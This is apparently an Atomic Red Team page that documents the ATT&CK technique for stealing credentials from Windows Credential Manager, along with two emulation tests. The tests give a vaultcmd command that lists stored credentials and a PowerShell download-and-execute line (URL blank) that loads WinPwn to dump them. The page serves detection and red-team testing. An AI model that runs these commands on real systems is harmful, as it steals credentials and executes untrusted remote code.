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Credentials from Password Stores: Windows Credential Manager

Description from ATT&CK

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted

files, located under
. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up…” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)

Atomic Tests

Atomic Test #1 - Access Saved Credentials via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos

Supported Platforms: windows

auto_generated_guid: 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439



Attack Commands: Run with command_prompt!

vaultcmd /listcreds:"Windows Credentials"

Atomic Test #2 - WinPwn - Loot local Credentials - Invoke-WCMDump

Loot local Credentials - Invoke-WCMDump technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: fa714db1-63dd-479e-a58e-7b2b52ca5997



Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('')
